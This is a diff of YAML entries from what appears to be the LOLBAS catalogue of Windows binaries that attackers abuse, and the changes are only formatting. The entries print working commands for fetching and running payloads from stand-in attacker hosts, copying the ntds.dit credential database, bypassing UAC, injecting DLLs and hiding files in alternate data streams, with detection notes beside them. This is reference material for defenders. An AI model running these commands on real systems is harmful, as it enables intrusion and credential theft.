   - Command: diantz.exe c:\pathToFile\file.exe c:\destinationFolder\targetFile.txt:targetFile.cab
     Description: Compress taget file into a cab file stored in the Alternate Data Stream (ADS) of the target file.
-    Usecase: Hide data compressed into an Alternate Data Stream. 
+    Usecase: Hide data compressed into an Alternate Data Stream.
     Category: ADS
     Privileges: User
     MitreID: T1096
@@ -14,7 +14,7 @@ Commands:
     OperatingSystem: Windows XP, Windows vista, Windows 7, Windows 8, Windows 8.1.
   - Command: diantz.exe \\remotemachine\pathToFile\file.exe c:\destinationFolder\file.cab
     Description: Download and compress a remote file and store it in a cab file on local machine.
-    Usecase: Download and compress into a cab file. 
+    Usecase: Download and compress into a cab file.
     Category: Download
     Privileges: User
     MitreID: T1105
@@ -23,9 +23,9 @@ Commands:
 Full_Path:
   - Path: c:\windows\system32\diantz.exe
   - Path: c:\windows\syswow64\diantz.exe
-Code_Sample: 
+Code_Sample:
-  - Code: 
+  - Code:
-Detection: 
+Detection:
   - IOC: diantz storing data into alternate data streams.
   - IOC: diantz getting a file from a remote machine or the internet.
 Resources:

yml/OSBinaries/Diskshadow.yml

@@ -2,7 +2,7 @@
 Name: Diskshadow.exe
 Description: Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: diskshadow.exe /s c:\test\diskshadow.txt
     Description: Execute commands using diskshadow.exe from a prepared diskshadow script.
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\diskshadow.exe
   - Path: C:\Windows\SysWOW64\diskshadow.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Child process from diskshadow.exe
@@ -33,4 +33,4 @@ Resources:
 Acknowledgement:
   - Person: Jimmy
     Handle: '@bohops'
----
+---

yml/OSBinaries/Dnscmd.yml

@@ -2,7 +2,7 @@
 Name: Dnscmd.exe
 Description: A command-line interface for managing DNS servers
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
     Description: Adds a specially crafted DLL as a plug-in of the DNS Service. This command must be run on a DC by a user that is at least a member of the DnsAdmins group. See the reference links for DLL details.
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\Dnscmd.exe
   - Path: C:\Windows\SysWOW64\Dnscmd.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Dnscmd.exe loading dll from UNC path
@@ -32,4 +32,4 @@ Acknowledgement:
     Handle: '@dim0x69'
   - Person: Nikhil SamratAshok
     Handle: '@nikhil_mitt'
----
+---

yml/OSBinaries/Esentutl.yml

@@ -2,12 +2,12 @@
 Name: Esentutl.exe
 Description: Binary for working with Microsoft Joint Engine Technology (JET) database
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
     Description: Copies the source VBS file to the destination VBS file.
     Usecase: Copies files from A to B
-    Category: Copy 
+    Category: Copy
     Privileges: User
     MitreID: T1105
     MitreLink: https://attack.mitre.org/wiki/Technique/T1105
@@ -29,7 +29,7 @@ Commands:
     MitreLink: https://attack.mitre.org/wiki/Technique/T1096
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
-    Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.  
+    Description: Copies the remote source EXE to the destination Alternate Data Stream (ADS) of the destination file.
     Usecase: Copy file and hide it in an alternate data stream as a defensive counter measure
     Category: ADS
     Privileges: User
@@ -47,7 +47,7 @@ Commands:
   - Command: esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
     Description: Copies a (locked) file using Volume Shadow Copy
     Usecase: Copy/extract a locked file such as the AD Database
-    Category: Copy 
+    Category: Copy
     Privileges: Admin
     MitreID: T1003
     MitreLink: https://attack.mitre.org/techniques/T1003/
@@ -55,10 +55,10 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\esentutl.exe
   - Path: C:\Windows\SysWOW64\esentutl.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
- - IOC: 
+ - IOC:
 Resources:
   - Link: https://twitter.com/egre55/status/985994639202283520
   - Link: https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/

yml/OSBinaries/Eventvwr.yml

@@ -2,11 +2,11 @@
 Name: Eventvwr.exe
 Description: Displays Windows Event Logs in a GUI window.
 Author: 'Jacob Gajek'
-Created: '2018-11-01'
+Created: 2018-11-01
 Commands:
   - Command: eventvwr.exe
     Description: During startup, eventvwr.exe checks the registry value HKCU\Software\Classes\mscfile\shell\open\command for the location of mmc.exe, which is used to open the eventvwr.msc saved console file. If the location of another binary or script is added to this registry value, it will be executed as a high-integrity process without a UAC prompt being displayed to the user.
-    Usecase: Execute a binary or script as a high-integrity process without a UAC prompt. 
+    Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
     Category: UAC bypass
     Privileges: User
     MitreID: T1088
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\eventvwr.exe
   - Path: C:\Windows\SysWOW64\eventvwr.exe
-Code Sample:
+Code_Sample:
   - Code: https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
 Detection:
  - IOC: eventvwr.exe launching child process other than mmc.exe

yml/OSBinaries/Expand.yml

@@ -2,7 +2,7 @@
 Name: Expand.exe
 Description: Binary that expands one or more compressed files
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: expand \\webdav\folder\file.bat c:\ADS\file.bat
     Description: Copies source file to destination.
@@ -31,10 +31,10 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\Expand.exe
   - Path: C:\Windows\SysWOW64\Expand.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
- - IOC: 
+ - IOC:
 Resources:
   - Link: https://twitter.com/infosecn1nja/status/986628482858807297
   - Link: https://twitter.com/Oddvarmoe/status/986709068759949319
@@ -43,4 +43,4 @@ Acknowledgement:
     Handle: '@infosecn1nja'
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'
----
+---

yml/OSBinaries/Explorer.yml

@@ -2,7 +2,7 @@
 Name: Explorer.exe
 Description: Binary used for managing files and system components within Windows
 Author: 'Jai Minton'
-Created: '2020-06-24'
+Created: 2020-06-24
 Commands:
   - Command: explorer.exe /root,"C:\Windows\System32\calc.exe"
     Description: Execute calc.exe with the parent process spawning from a new instance of explorer.exe
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\explorer.exe
   - Path: C:\Windows\SysWOW64\explorer.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Multiple instances of explorer.exe or explorer.exe using the /root command line can help to detect this.

yml/OSBinaries/Extexport.yml

@@ -1,8 +1,8 @@
 ---
 Name: Extexport.exe
-Description: 
+Description:
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: Extexport.exe c:\test foo bar
     Description: Load a DLL located in the c:\test folder with one of the following names mozcrt19.dll, mozsqlite3.dll, or sqlite.dll
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Program Files\Internet Explorer\Extexport.exe
   - Path: C:\Program Files (x86)\Internet Explorer\Extexport.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Extexport.exe loads dll and is execute from other folder the original path
@@ -24,4 +24,4 @@ Resources:
 Acknowledgement:
   - Person: Adam
     Handle: '@hexacorn'
----
+---

yml/OSBinaries/Extrac32.yml

@@ -1,12 +1,12 @@
 ---
 Name: Extrac32.exe
-Description: 
+Description:
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
     Description: Extracts the source CAB file into an Alternate Data Stream (ADS) of the target file.
-    Usecase: Extract data from cab file and hide it in an alternate data stream. 
+    Usecase: Extract data from cab file and hide it in an alternate data stream.
     Category: ADS
     Privileges: User
     MitreID: T1096
@@ -14,7 +14,7 @@ Commands:
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
   - Command: extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
     Description: Extracts the source CAB file on an unc path into an Alternate Data Stream (ADS) of the target file.
-    Usecase: Extract data from cab file and hide it in an alternate data stream. 
+    Usecase: Extract data from cab file and hide it in an alternate data stream.
     Category: ADS
     Privileges: User
     MitreID: T1096
@@ -39,10 +39,10 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\extrac32.exe
   - Path: C:\Windows\SysWOW64\extrac32.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
- - IOC: 
+ - IOC:
 Resources:
   - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f

yml/OSBinaries/Findstr.yml

@@ -1,8 +1,8 @@
 ---
 Name: Findstr.exe
-Description: 
+Description:
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: findstr /V /L W3AllLov3DonaldTrump c:\ADS\file.exe > c:\ADS\file.txt:file.exe
     Description: Searches for the string W3AllLov3DonaldTrump, since it does not exist (/V) file.exe is written to an Alternate Data Stream (ADS) of the file.txt file.
@@ -39,7 +39,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\findstr.exe
   - Path: C:\Windows\SysWOW64\findstr.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: findstr.exe should normally not be invoked on a client system

yml/OSBinaries/Forfiles.yml

@@ -2,7 +2,7 @@
 Name: Forfiles.exe
 Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
     Description: Executes calc.exe since there is a match for notepad.exe in the c:\windows\System32 folder.
@@ -23,10 +23,10 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\forfiles.exe
   - Path: C:\Windows\SysWOW64\forfiles.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
- - IOC: 
+ - IOC:
 Resources:
   - Link: https://twitter.com/vector_sec/status/896049052642533376
   - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
@@ -36,4 +36,4 @@ Acknowledgement:
     Handle: '@vector_sec'
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'
----
+---

yml/OSBinaries/Ftp.yml

@@ -2,7 +2,7 @@
 Name: Ftp.exe
 Description: A binary designed for connecting to FTP servers
 Author: 'Oddvar Moe'
-Created: '2018-12-10'
+Created: 2018-12-10
 Commands:
   - Command: echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
     Description: Executes the commands you put inside the text file.
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\ftp.exe
   - Path: C:\Windows\SysWOW64\ftp.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: cmd /c as child process of ftp.exe

yml/OSBinaries/GfxDownloadWrapper.yml

@@ -2,7 +2,7 @@
 Name: GfxDownloadWrapper.exe
 Description: Remote file download used by the Intel Graphics Control Panel, receives as first parameter a URL and a destination file path.
 Author: Jesus Galvez
-Created: Jesus Galvez
+Created: 2019-12-27
 Commands:
   - Command: C:\Windows\System32\DriverStore\FileRepository\igdlh64.inf_amd64_[0-9]+\GfxDownloadWrapper.exe "URL" "DESTINATION FILE"
     Description: GfxDownloadWrapper.exe downloads the content that returns URL and writes it to the file DESTINATION FILE PATH. The binary is signed by "Microsoft Windows Hardware", "Compatibility Publisher", "Microsoft Windows Third Party Component CA 2012", "Microsoft Time-Stamp PCA 2010", "Microsoft Time-Stamp Service".
@@ -169,7 +169,7 @@ Full_Path:
   - Path: c:\windows\system32\driverstore\filerepository\ki132574.inf_amd64_54c9b905b975ee55\
   - Path: c:\windows\system32\driverstore\filerepository\ki132869.inf_amd64_052eb72d070df60f\
   - Path: c:\windows\system32\driverstore\filerepository\kit126731.inf_amd64_1905c9d5f38631d9\
-Detection: 
+Detection:
   - IOC: Usually GfxDownloadWrapper downloads a JSON file from https://gameplayapi.intel.com.
 Resources:
   - Link: https://www.sothis.tech/author/jgalvez/

yml/OSBinaries/Gpscript.yml

@@ -1,8 +1,8 @@
 ---
 Name: Gpscript.exe
-Description: Used by group policy to process scripts 
+Description: Used by group policy to process scripts
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: Gpscript /logon
     Description: Executes logon scripts configured in Group Policy.
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\gpscript.exe
   - Path: C:\Windows\SysWOW64\gpscript.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Scripts added in local group policy
@@ -33,4 +33,4 @@ Resources:
 Acknowledgement:
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'
----
+---

yml/OSBinaries/Hh.yml

@@ -2,7 +2,7 @@
 Name: Hh.exe
 Description: Binary used for processing chm files in Windows
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: HH.exe http://some.url/script.ps1
     Description: Open the target PowerShell script with HTML Help.
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\hh.exe
   - Path: C:\Windows\SysWOW64\hh.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: hh.exe should normally not be in use on a normal workstation
@@ -32,4 +32,4 @@ Resources:
 Acknowledgement:
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'
----
+---

yml/OSBinaries/Ie4uinit.yml

@@ -1,8 +1,8 @@
 ---
 Name: Ie4uinit.exe
-Description: 
+Description:
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: ie4uinit.exe -BaseSettings
     Description: Executes commands from a specially prepared ie4uinit.inf file.
@@ -17,7 +17,7 @@ Full_Path:
   - Path: c:\windows\sysWOW64\ie4uinit.exe
   - Path: c:\windows\system32\ieuinit.inf
   - Path: c:\windows\sysWOW64\ieuinit.inf
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: ie4uinit.exe loading a inf file from outside %windir%
@@ -26,4 +26,4 @@ Resources:
 Acknowledgement:
   - Person: Jimmy
     Handle: '@bohops'
----
+---

yml/OSBinaries/Ieexec.yml

@@ -2,9 +2,9 @@
 Name: Ieexec.exe
 Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL.
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
-  - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe 
+  - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
     Description: Downloads and executes bypass.exe from the remote server.
     Usecase: Download and run attacker code from remote location
     Category: Download
@@ -12,7 +12,7 @@ Commands:
     MitreID: T1105
     MitreLink: https://attack.mitre.org/wiki/Technique/T1105
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
-  - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe 
+  - Command: ieexec.exe http://x.x.x.x:8080/bypass.exe
     Description: Downloads and executes bypass.exe from the remote server.
     Usecase: Download and run attacker code from remote location
     Category: Execute
@@ -23,13 +23,13 @@ Commands:
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe
-Code_Sample: 
+Code_Sample:
   - Code:
 Detection:
-  - IOC: 
+  - IOC:
 Resources:
   - Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'
----
+---

yml/OSBinaries/Ilasm.yml

@@ -2,7 +2,7 @@
 Name: Ilasm.exe
 Description: used for compile c# code into dll or exe.
 Author: Hai vaknin (lux)
-Created: 17/03/2020
+Created: 2020-03-17
 Commands:
   - Command: ilasm.exe C:\public\test.txt /exe
     Description: Binary file used by .NET to compile c# code to .exe
@@ -11,7 +11,7 @@ Commands:
     Privileges: User
     MitreID: T1127
     MitreLink: https://attack.mitre.org/techniques/T1127/
-    OperatingSystem: Windows 10,7 
+    OperatingSystem: Windows 10,7
   - Command: ilasm.exe C:\public\test.txt /dll
     Description: Binary file used by .NET to compile c# code to dll
     Usecase: A description of the usecase
@@ -22,7 +22,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Resources:
   - Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt

yml/OSBinaries/Infdefaultinstall.yml

@@ -2,7 +2,7 @@
 Name: Infdefaultinstall.exe
 Description: Binary used to perform installation based on content inside inf files
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: InfDefaultInstall.exe Infdefaultinstall.inf
     Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.
@@ -15,7 +15,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\Infdefaultinstall.exe
   - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe
-Code_Sample: 
+Code_Sample:
 - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
 Detection:
  - IOC:
@@ -25,4 +25,4 @@ Resources:
 Acknowledgement:
   - Person: Kyle Hanslovan
     Handle: '@kylehanslovan'
----
+---

yml/OSBinaries/Installutil.yml

@@ -2,7 +2,7 @@
 Name: Installutil.exe
 Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
     Description: Execute the target .NET DLL or EXE.
@@ -25,7 +25,7 @@ Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
   - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC:
@@ -39,4 +39,4 @@ Resources:
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'
----
+---

yml/OSBinaries/Jsc.yml

@@ -2,7 +2,7 @@
 Name: Jsc.exe
 Description: Binary file used by .NET to compile javascript code to .exe or .dll format
 Author: 'Oddvar Moe'
-Created: '2019-05-31'
+Created: 2019-05-31
 Commands:
   - Command: jsc.exe scriptfile.js
     Description: Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
@@ -25,14 +25,14 @@ Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
   - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
   - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
- - IOC: Jsc.exe should normally not run a system unless it is used for development. 
+ - IOC: Jsc.exe should normally not run a system unless it is used for development.
 Resources:
   - Link: https://twitter.com/DissectMalware/status/998797808907046913
   - Link: https://www.phpied.com/make-your-javascript-a-windows-exe/
 Acknowledgement:
   - Person: Malwrologist
     Handle: '@DissectMalware'
----
+---

yml/OSBinaries/Makecab.yml

@@ -2,7 +2,7 @@
 Name: Makecab.exe
 Description: Binary to package existing files into a cabinet (.cab) file
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab
     Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
@@ -31,7 +31,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\makecab.exe
   - Path: C:\Windows\SysWOW64\makecab.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Makecab getting files from Internet
@@ -41,4 +41,4 @@ Resources:
 Acknowledgement:
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'
----
+---

yml/OSBinaries/Mavinject.yml

@@ -2,7 +2,7 @@
 Name: Mavinject.exe
 Description: Used by App-v in Windows
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: MavInject.exe 3110 /INJECTRUNNING c:\folder\evil.dll
     Description: Inject evil.dll into a process with PID 3110.
@@ -23,7 +23,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\mavinject.exe
   - Path: C:\Windows\SysWOW64\mavinject.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: mavinject.exe should not run unless APP-v is in use on the workstation
@@ -36,4 +36,4 @@ Acknowledgement:
     Handle: '@gN3mes1s'
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'
----
+---

yml/OSBinaries/Microsoft.Workflow.Compiler.yml

@@ -2,7 +2,7 @@
 Name: Microsoft.Workflow.Compiler.exe
 Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
 Author: 'Conor Richard'
-Created: '2018-10-22'
+Created: 2018-10-22
 Commands:
   - Command: Microsoft.Workflow.Compiler.exe tests.xml results.xml
     Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.xml file.
@@ -19,7 +19,7 @@ Commands:
     Privileges: User
     MitreID: T1127
     MitreLink: https://attack.mitre.org/wiki/Technique/T1127
-    OperatingSystem: Windows 10S 
+    OperatingSystem: Windows 10S
   - Command: Microsoft.Workflow.Compiler.exe tests.txt results.txt
     Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
     Usecase: Compile and run code
@@ -27,10 +27,10 @@ Commands:
     Privileges: User
     MitreID: T1127
     MitreLink: https://attack.mitre.org/wiki/Technique/T1127
-    OperatingSystem: Windows 10S 
+    OperatingSystem: Windows 10S
 Full_Path:
   - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
  - IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
@@ -53,4 +53,4 @@ Acknowledgement:
     Handle: '@FortyNorthSec'
   - Person: Bank Security
     Handle: '@Bank_Security'
----
+---

yml/OSBinaries/Mmc.yml

@@ -2,7 +2,7 @@
 Name: Mmc.exe
 Description: Load snap-ins to locally and remotely manage Windows systems
 Author: '@bohops'
-Created: '2018-12-04'
+Created: 2018-12-04
 Commands:
   - Command: mmc.exe -Embedding c:\path\to\test.msc
     Description: Launch a 'backgrounded' MMC process and invoke a COM payload
@@ -15,10 +15,10 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\mmc.exe
   - Path: C:\Windows\SysWOW64\mmc.exe
-Code_Sample: 
+Code_Sample:
 - Code:
 Detection:
- - IOC: 
+ - IOC:
 Resources:
   - Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
 Acknowledgement:

yml/OSBinaries/MpCmdRun.yml

@@ -2,7 +2,7 @@
 Name: MpCmdRun.exe
 Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
 Author: 'Oddvar Moe'
-Created: '09/03/2020'
+Created: 2020-03-20
 Commands:
   - Command: MpCmdRun.exe -DownloadFile -url https://attacker.server/beacon.exe -path c:\\temp\\beacon.exe
     Description: Download file to specified path - Slashes work as well as dashes (/DownloadFile, /url, /path)
@@ -32,9 +32,9 @@ Full_Path:
   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe
   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe
   - Path: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
-Code_Sample: 
+Code_Sample:
-  - Code: 
+  - Code:
-Detection: 
+Detection:
   - IOC: MpCmdRun storing data into alternate data streams.
   - IOC: MpCmdRun getting a file from a remote machine or the internet that is not expected.
   - IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe.
@@ -54,4 +54,4 @@ Acknowledgement:
     Handle: ''
   - Person: Cedric
     Handle: '@th3c3dr1c'
----
+---

yml/OSBinaries/Msbuild.yml

@@ -1,8 +1,8 @@
 ---
-Name: Msbuild.exe 
+Name: Msbuild.exe
 Description: Used to compile and execute code
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: msbuild.exe pshell.xml
     Description: Build and execute a C# project stored in the target XML file.
@@ -37,7 +37,7 @@ Full_Path:
   - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe
   - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
 Code_Sample: 
-- Code:
+  - Code:
 Detection:
  - IOC: Msbuild.exe should not normally be executed on workstations
 Resources:

yml/OSBinaries/Msconfig.yml

@@ -2,7 +2,7 @@
 Name: Msconfig.exe
 Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: Msconfig.exe -5
     Description: Executes command embeded in crafted c:\windows\system32\mscfgtlc.xml.
@@ -14,7 +14,7 @@ Commands:
     OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
 Full_Path:
   - Path: C:\Windows\System32\msconfig.exe
-Code_Sample: 
+Code_Sample:
 - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/mscfgtlc.xml
 Detection:
  - IOC: mscfgtlc.xml changes in system32 folder
@@ -24,4 +24,4 @@ Resources:
 Acknowledgement:
   - Person: Pierre-Alexandre Braeken
     Handle: '@pabraeken'
----
+---

yml/OSBinaries/Msdt.yml

@@ -1,8 +1,8 @@
 ---
 Name: Msdt.exe
-Description: Microsoft diagnostics tool 
+Description: Microsoft diagnostics tool
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: msdt.exe -path C:\WINDOWS\diagnostics\index\PCWDiagnostic.xml -af C:\PCW8E57.xml /skip TRUE
     Description: Executes the Microsoft Diagnostics Tool and executes the malicious .MSI referenced in the PCW8E57.xml file.
@@ -23,15 +23,15 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\Msdt.exe
   - Path: C:\Windows\SysWOW64\Msdt.exe
-Code_Sample: 
+Code_Sample:
 - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/PCW8E57.xml
 Detection:
- - IOC: 
+ - IOC:
 Resources:
   - Link: https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
   - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
   - Link: https://twitter.com/harr0ey/status/991338229952598016
 Acknowledgement:
-  - Person: 
+  - Person:
     Handle:
----
+---

yml/OSBinaries/Mshta.yml

@@ -2,7 +2,7 @@
 Name: Mshta.exe
 Description: Used by Windows to execute html applications. (.hta)
 Author: 'Oddvar Moe'
-Created: '2018-05-25'
+Created: 2018-05-25
 Commands:
   - Command: mshta.exe evilfile.hta
     Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
@@ -39,7 +39,7 @@ Commands:
 Full_Path:
   - Path: C:\Windows\System32\mshta.exe
   - Path: C:\Windows\SysWOW64\mshta.exe
-Code_Sample: 
+Code_Sample:
 - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Mshta_calc.sct
 Detection:
  - IOC: mshta.exe executing raw or obfuscated script within the command-line
@@ -48,10 +48,10 @@ Resources:
   - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4
   - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct
   - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
-  - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/  
+  - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
 Acknowledgement:
   - Person: Casey Smith
     Handle: '@subtee'
   - Person: Oddvar Moe
     Handle: '@oddvarmoe'
----
+---

yml/OSBinaries/Msiexec.yml

@@ -2,7 +2,7 @@
 Name: Msiexec.exe
 Description: Used by Windows to execute msi files
